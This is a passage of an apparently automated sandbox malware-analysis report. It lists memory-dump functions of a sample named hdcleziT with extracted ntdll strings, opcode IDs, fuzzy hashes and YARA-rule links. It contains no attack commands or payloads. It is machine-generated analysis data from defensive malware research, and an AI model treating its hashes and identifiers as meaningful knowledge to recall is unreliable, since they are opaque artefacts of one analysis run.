                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 24CBA309
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                    • API String ID: 0-2876891731
                                                                                                    • Opcode ID: 835b1f7999ef9320af304f8febcfb0a7884d97b21fa893c9495fc48d8594b73f
                                                                                                    • Instruction ID: 383f05e21417ddb574e8907bcac2771fb42c8613f60770ad357c54562dae0504
                                                                                                    • Opcode Fuzzy Hash: 835b1f7999ef9320af304f8febcfb0a7884d97b21fa893c9495fc48d8594b73f
                                                                                                    • Instruction Fuzzy Hash: 0B41AB30A04749DBDB028F59D940F5E7BB6FF84310F1440A9E984EB2A5E276DA00CB51
                                                                                                    Function 24CF0FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • @, xrefs: 24CF1050
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 24CF1025
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                                    • API String ID: 0-2976085014
                                                                                                    • Opcode ID: c0e4e45ae02199499bda74ef677536b273c30032156b143dee0c265f8b1bc324
                                                                                                    • Instruction ID: 6dfafbba0153cd9e997f2a408c243c71a03a5d2386663c8baf15e88586f9599f
                                                                                                    • Opcode Fuzzy Hash: c0e4e45ae02199499bda74ef677536b273c30032156b143dee0c265f8b1bc324
                                                                                                    • Instruction Fuzzy Hash: BB31B672900558AFDB12DF99CC84F9F7BBAEB94750F010566E900A7254DB79DD01CBA0
                                                                                                    Function 24CEA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                    • Opcode ID: c507aa4fc16b323ea8fa100fc048fb8461fa8c7c7adcd5aa4b975297cf9a0fdb
                                                                                                    • Instruction ID: 7172f5a100908a105f04f57469c2621f63922e855d0c8fe2d754e24ea1d60a6c
                                                                                                    • Opcode Fuzzy Hash: c507aa4fc16b323ea8fa100fc048fb8461fa8c7c7adcd5aa4b975297cf9a0fdb
                                                                                                    • Instruction Fuzzy Hash: 8601ADB2600640EFE311CF18CE45B2677EAE745719F0589B9A65CC7190E335D804CB46
                                                                                                    Function 24CBC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: MUI
                                                                                                    • API String ID: 0-1339004836
                                                                                                    • Opcode ID: a633b807f67710bbe6487c32d3b3b0917a1d2dd46761155139fc83271cc4439f
                                                                                                    • Instruction ID: 69616a16383ce3e664d2804fc36d105fd97eeae8b6d99764fae2a07f763d5a55
                                                                                                    • Opcode Fuzzy Hash: a633b807f67710bbe6487c32d3b3b0917a1d2dd46761155139fc83271cc4439f
                                                                                                    • Instruction Fuzzy Hash: 3C825D75E002188FEB25CFADC980B9DBBB6BF44350F1481A9E999AB391D7349D42CF50
                                                                                                    Function 24D4CC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: w
                                                                                                    • API String ID: 0-476252946
                                                                                                    • Opcode ID: 035f5588e26e5d1f83bda7842e930756aa253b77727146dc8a9681f69419e66e
                                                                                                    • Instruction ID: 1907bb7b5f393be3ed3be87da113beb22a3bf9f2c882ab4268a50d1cf9bef452
                                                                                                    • Opcode Fuzzy Hash: 035f5588e26e5d1f83bda7842e930756aa253b77727146dc8a9681f69419e66e
                                                                                                    • Instruction Fuzzy Hash: 6BD18E74E00215EBDB18CF55C881ABEBBF1FF44B04F15885EE8999B241E335EA92D760
                                                                                                    Function 24D54C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                                    • Instruction ID: 5ae1daee0c4a0ed8a2b55ed1e6c2c362940745c6ed57268b1f0a7376658b963b
                                                                                                    • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                                    • Instruction Fuzzy Hash: 5AA15171E01209AFDF05CF98C990BAEBBB9FF58740F10406EEA11B7265EB74A940CB51
                                                                                                    Function 24D36420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3916222277
                                                                                                    • Opcode ID: 1c8e091169dcb26a41efeb54190cf8d34ac563a31d3cf3ddcdd0c237b2b7e896
                                                                                                    • Instruction ID: 12f713d56728a3ba55e10ec1300e92f4f55a94a636561e73e402803c5f97a468
                                                                                                    • Opcode Fuzzy Hash: 1c8e091169dcb26a41efeb54190cf8d34ac563a31d3cf3ddcdd0c237b2b7e896
                                                                                                    • Instruction Fuzzy Hash: 0F916076A01619AFEB21CF98CD85FAE7BB9EF14B50F110069F600AB194D774A900CFA0
                                                                                                    Function 24D5E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3916222277
                                                                                                    • Opcode ID: f9ec618f2d2f49eeb9c32eeeb487dfca58d611c6e5b7050b8167156a0fc8fad1
                                                                                                    • Instruction ID: fae3a180f9b226760bc30c96ffade583e7ed8c473d463ff28e385da9e6aaafc1
                                                                                                    • Opcode Fuzzy Hash: f9ec618f2d2f49eeb9c32eeeb487dfca58d611c6e5b7050b8167156a0fc8fad1
                                                                                                    • Instruction Fuzzy Hash: C3919F32A01619AFEF12AFA4DC84F9FBBBAFF45740F100029F514A7264DB789905CB91
                                                                                                    Function 24CEA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: GlobalTags
                                                                                                    • API String ID: 0-1106856819
                                                                                                    • Opcode ID: 89b1ae57154be13e4a61439f61e2f715cf8de5bf9ff34b2ce54ec02cc5f30266
                                                                                                    • Instruction ID: c73dcfd728417acae6456a4f311daa9096590da4f4e826089046a9a2171c3803
                                                                                                    • Opcode Fuzzy Hash: 89b1ae57154be13e4a61439f61e2f715cf8de5bf9ff34b2ce54ec02cc5f30266
                                                                                                    • Instruction Fuzzy Hash: 3E718C79E0070ACFDB18CF98D590A9DBBB2BF48B04F10816EE905A7686E7318D01CB60
                                                                                                    Function 24CCE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: EXT-
                                                                                                    • API String ID: 0-1948896318
                                                                                                    • Opcode ID: e98a75c2962895aa314e338cf4c15d6ecd4660bb66025062dff4907e9e245f44
                                                                                                    • Instruction ID: 9ff54187b049b74adc8d75a1aded0109882170c9dda4afb3959eef01eb45db63
                                                                                                    • Opcode Fuzzy Hash: e98a75c2962895aa314e338cf4c15d6ecd4660bb66025062dff4907e9e245f44
                                                                                                    • Instruction Fuzzy Hash: 7541B0B25083119BE711CB79C880B5BBBEAAF99714F040A6DFA84E7180EB74D904C792
                                                                                                    Function 24CACDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: AlternateCodePage
                                                                                                    • API String ID: 0-3889302423
                                                                                                    • Opcode ID: aaaa999ac26dafa046a94c5eda9eeed5922eee9dd8b6cbc5f83da9ab46d989f0
                                                                                                    • Instruction ID: 2e016a1b69d1aea8313ce2f8f31c5ec74a71421d7fb11ae8b5e9808fe1f22077
                                                                                                    • Opcode Fuzzy Hash: aaaa999ac26dafa046a94c5eda9eeed5922eee9dd8b6cbc5f83da9ab46d989f0
                                                                                                    • Instruction Fuzzy Hash: 7041BE76900219ABDF15CF99CC88AEEBBB9FF94310F11816EE911A7354D634DB41CB90
                                                                                                    Function 24D2C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BinaryHash
                                                                                                    • API String ID: 0-2202222882
                                                                                                    • Opcode ID: 953fe21d9166e97d90ce612097f85a18169ca336cae7fee855af06fe6a3b561d
                                                                                                    • Instruction ID: 6c0976e3918cb4ce3c76e38a38506121694d0532b8b4e6418f1c52e15b084655
                                                                                                    • Opcode Fuzzy Hash: 953fe21d9166e97d90ce612097f85a18169ca336cae7fee855af06fe6a3b561d
                                                                                                    • Instruction Fuzzy Hash: FF4177B1D0152CAFEB21CB54CC80FDEB77DAB44718F0185D9EA08AB145DB709E488FA5
                                                                                                    Function 24D2CCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TrustedInstaller
                                                                                                    • API String ID: 0-565535830
                                                                                                    • Opcode ID: c8a2ceb21fc3932a0e02ee47d3d1030969219effc19a98ceac3e886dc258d64f
                                                                                                    • Instruction ID: 09c38527c91f27dedaaf17f456ddbb3e942cd4a23e693cba761d237db237e069
                                                                                                    • Opcode Fuzzy Hash: c8a2ceb21fc3932a0e02ee47d3d1030969219effc19a98ceac3e886dc258d64f
                                                                                                    • Instruction Fuzzy Hash: E731B232940619BFEB12DB98CC50FEE7B79EB54B54F0105AAFA00AB251D674CE41CB90
                                                                                                    Function 24D4AEB0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 24D4AF2F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                    • API String ID: 0-1911121157
                                                                                                    • Opcode ID: bccb0f207878c8ba190f76f088af6dd4d71cfd491b9791427dc137a5f50e58ec
                                                                                                    • Instruction ID: 5a14d764f94fc0308c92d96e88855d9cf177e0152e768ee601d753c67f5b1a1c
                                                                                                    • Opcode Fuzzy Hash: bccb0f207878c8ba190f76f088af6dd4d71cfd491b9791427dc137a5f50e58ec
                                                                                                    • Instruction Fuzzy Hash: 6231E5B6E00654AFDB01DF64CC44F5ABBB6FB44B10F11866AF605E7794D738A901CBA0
                                                                                                    Function 24CD8CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: WindowsExcludedProcs
                                                                                                    • API String ID: 0-3583428290
                                                                                                    • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                                    • Instruction ID: 131f528d8edf7d421c37324428bb005656f444e496c13fd361931e2c7ccc024a
                                                                                                    • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                                    • Instruction Fuzzy Hash: 8B210737605116EBDB128A5EC840F4B7BBEAFA1E90F1540AAFB259B194C734DD0087B0
                                                                                                    Function 24D66FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Critical error detected %lx, xrefs: 24D67027
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Critical error detected %lx
                                                                                                    • API String ID: 0-802127002
                                                                                                    • Opcode ID: a5c03775b978cc76819755b9e268bb58c6740e63dacda431c7f2b6f5afef3784
                                                                                                    • Instruction ID: 11206eecede56a84fd67554b527cadff3fd29bc5e7c93b3bae3cea87d0c0d693
                                                                                                    • Opcode Fuzzy Hash: a5c03775b978cc76819755b9e268bb58c6740e63dacda431c7f2b6f5afef3784
                                                                                                    • Instruction Fuzzy Hash: 16115776E04748CBEB25CFA8E941BDDFBB1EB04314F20822ED166AB292E7754505CF24
                                                                                                    Function 24D52000 Relevance: .8, Instructions: 757COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fca02ac0eb108502bd5c179bb6ffaec08fafcc700af27c54d2e63288c1767bf9
                                                                                                    • Instruction ID: 515e431a35b2b5fd8b537d7e403d703f6099c47156383c952efaf44b958f331a
                                                                                                    • Opcode Fuzzy Hash: fca02ac0eb108502bd5c179bb6ffaec08fafcc700af27c54d2e63288c1767bf9
                                                                                                    • Instruction Fuzzy Hash: F842D1366083419FDB15CFA8C890B6BBBE5BF98340F04492DFA959B260DB70D949CF52
                                                                                                    Function 24D48158 Relevance: .6, Instructions: 617COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 91445760ae34dab37a2203b7f30c40cfa690fba92045c715af863ce632ae6a62
                                                                                                    • Instruction ID: 9969a92b5a3004734bcc495bffe65ff3b8340b685304ed9ce03eaf0a31b5154c
                                                                                                    • Opcode Fuzzy Hash: 91445760ae34dab37a2203b7f30c40cfa690fba92045c715af863ce632ae6a62
                                                                                                    • Instruction Fuzzy Hash: 86424D75E402598FEB15CF69C881BADBBF6BF48350F14819DE948EB241D7349981CF60
                                                                                                    Function 24D5A118 Relevance: .6, Instructions: 591COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7ece286323f323dbc294e5272a9ac20f9e2cd9e8584493f97a4d3ae4437a6e1e
                                                                                                    • Instruction ID: 10cecdfc71bf3583db4e7e02aec86b65ed48e0c3e8970e5f48865b6ff7203c6c
                                                                                                    • Opcode Fuzzy Hash: 7ece286323f323dbc294e5272a9ac20f9e2cd9e8584493f97a4d3ae4437a6e1e
                                                                                                    • Instruction Fuzzy Hash: 7A229A702046718BDF15CF29C090B62BBE1BF44344F04849EE9968F7A6EB35E95ACB61
                                                                                                    Function 24CD8DBF Relevance: .6, Instructions: 554COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2e0be9f10f07d5d582ddadae9b30db50a50ab04891d1ac44fbceb168d3d037b0
                                                                                                    • Instruction ID: 793e4a5b3a54a82f5937aa3a34ff673a89206bc7c95652a9ef84235dfac20ceb
                                                                                                    • Opcode Fuzzy Hash: 2e0be9f10f07d5d582ddadae9b30db50a50ab04891d1ac44fbceb168d3d037b0
                                                                                                    • Instruction Fuzzy Hash: 11227271E04116DBDB09CF99D4809BEFBF6FF48700B14849AE9599B245E738EE41CB60
                                                                                                    Function 24CB65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d070207744b5a3c04826f2616aabc27d598e412e1ed947b707abc294d20a24a9
                                                                                                    • Instruction ID: f79ce5d75b540c94a73a95a1183e7219073c849237064ecbc044e5a879e8b889
                                                                                                    • Opcode Fuzzy Hash: d070207744b5a3c04826f2616aabc27d598e412e1ed947b707abc294d20a24a9
                                                                                                    • Instruction Fuzzy Hash: 03E17A71A08341CFC705DF28C490A5ABBE2FF89714F058A6DE9D99B391DB31E905CB92
                                                                                                    Function 24CA8397 Relevance: .4, Instructions: 380COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fbea4e074729e117d347c0833fc8c8bf6298ea435f69614226bd4925fe623230
                                                                                                    • Instruction ID: cfca04024f10f272de37477f18cd04cd82ae23dd216c52f74622c0f51f6e2b39
                                                                                                    • Opcode Fuzzy Hash: fbea4e074729e117d347c0833fc8c8bf6298ea435f69614226bd4925fe623230
                                                                                                    • Instruction Fuzzy Hash: D5D1D671A08627DBDB04CFA9C890EAA77B6BF54304F04856DF915DB284FB34D944CBA0
                                                                                                    Function 24D46E20 Relevance: .4, Instructions: 379COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 407cd9bda445d7b86bb375af6b1480059a05ef12b17bd6daed2c05931ca312fd
                                                                                                    • Instruction ID: c6666137792f0330d2acb5706f9996b2eae395c17818d1b27a5ef6e74d0c717e
                                                                                                    • Opcode Fuzzy Hash: 407cd9bda445d7b86bb375af6b1480059a05ef12b17bd6daed2c05931ca312fd
                                                                                                    • Instruction Fuzzy Hash: 25E14E74E006599FCF05CFA8C980AEEBBF5BF49304F14819AE845EB245E335DA45CBA0
                                                                                                    Function 24CCCFE0 Relevance: .3, Instructions: 345COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bb6af7fbb78d58e3df49dc395243165ad44596c3304ed1afcb3b053423918616
                                                                                                    • Instruction ID: cdc95f7fe33a9dd6c85ae6b10df96548de7b3692410ef2d04d81673a4a262d97
                                                                                                    • Opcode Fuzzy Hash: bb6af7fbb78d58e3df49dc395243165ad44596c3304ed1afcb3b053423918616
                                                                                                    • Instruction Fuzzy Hash: 72D1A435B003298FEB25CF1DC890B9AB7B7BB45314F0540E9DA09A7285DB74AE85CF91
                                                                                                    Function 24D38243 Relevance: .3, Instructions: 322COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                    • Instruction ID: 48790daf2e8da5713b9e474a449a6d2f13f2e6f3a6dc96c1b268ffcf4367b5a6
                                                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                    • Instruction Fuzzy Hash: 18B16C78B41608AFDF14CB95C940AABBFFABF84304F50446DFA56A7694DA34E909CF10
                                                                                                    Function 24CC0535 Relevance: .3, Instructions: 300COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                    • Instruction ID: 6d28f88eb9220b0966c6a74430a17caa4d645782973ac14ac88169b0c99a0228
                                                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                    • Instruction Fuzzy Hash: 07B1F431700645AFDB15CFA9C850BAEBBF7AF84210F140199EA56DB385DB34EE41CB90
                                                                                                    Function 24CD0DE1 Relevance: .3, Instructions: 295COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4662f53565587d846b953f38c123d381909a99fe246db9cd11f784d01cf75133
                                                                                                    • Instruction ID: ab3ddc9a4e8f655aaced624a212fb99755bef170f2225d651abc2c8461bdf91b
                                                                                                    • Opcode Fuzzy Hash: 4662f53565587d846b953f38c123d381909a99fe246db9cd11f784d01cf75133
                                                                                                    • Instruction Fuzzy Hash: 21C13871E00259DFDB15CFAEC890A9EBBB6FF48354F10812AE605AB349DB74A941CF50
                                                                                                    Function 24CB83C0 Relevance: .3, Instructions: 281COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6b2e1f35945aedb59f64e99f82fb9c0916b60cbdac6233b0083cb3dc0bff540f
                                                                                                    • Instruction ID: a9920f71a321ed860fa69fff6f21e4ae1aead12b0c4f35fdcc757175f1df47e4
                                                                                                    • Opcode Fuzzy Hash: 6b2e1f35945aedb59f64e99f82fb9c0916b60cbdac6233b0083cb3dc0bff540f
                                                                                                    • Instruction Fuzzy Hash: FDC15A74208341CFE765CF19C494BABB7E6BF88704F44495DE98987291D774EA08CFA2
